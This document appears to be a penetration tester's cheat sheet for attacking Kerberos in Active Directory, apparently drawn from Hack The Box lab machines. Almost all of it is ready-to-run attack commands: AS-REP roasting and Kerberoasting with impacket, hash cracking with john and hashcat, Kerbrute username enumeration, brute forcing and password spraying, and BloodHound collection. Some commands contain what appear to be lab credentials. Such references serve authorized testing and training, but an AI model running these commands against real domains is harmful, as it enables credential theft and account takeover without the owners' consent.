88 KERBEROS

AS-REP Roasting

Null Credentials

impacket-GetNPUsers htb.local/ -dc-ip $ip -request

With Username

impacket-GetNPUsers -no-pass -dc-ip $ip intelligence.htb/Jose.Williams

python /usr/share/doc/python3-impacket/examples/GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip $ip | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'
  • With a user file (make sure to use the command in the same format shown below):

impacket-GetNPUsers cascade.local/ -no-pass -dc-ip $ip -usersfile uname.txt
  1. Crack the hash

john hash-file.txt --format=krb5asrep
hashcat hash-file.txt -m 18200 /usr/share/wordlists/rockyou.txt --force

Kerberoasting

If we have a password

GetUserSPNs.py -request -dc-ip $ip 'blackfield.local/support:#00^BlackKnight'

Kerbrute

  1. Check which usernames are valid

kerbrute userenum --dc $ip -d intelligence.htb usernames.txt
  2. Brute-force a single username (1 username - 99 passwords)

kerbrute bruteuser --dc $ip -d intelligence.htb passwords.txt uname
  3. Password spray (99 usernames - 1 password)

kerbrute passwordspray --dc $ip -d intelligence.htb usernames.txt Pass@1234
  4. Brute-force uname:pass pairs (file containing username:password in this format)

cat file | kerbrute bruteforce --dc $ip -d intelligence.htb -

BloodHound Enumeration

SharpHound

On shell

.\sharphound.exe
Import-Module .\sharphound.ps1
.\sharphound.ps1

Bloodhound.py

Enumerate using credentials

bloodhound-python -u Tracy.White -p zqwj041FGX -ns $ip -d nara-security.com -c all

https://notes.benheater.com/books/active-directory/page/remote-bloodhound

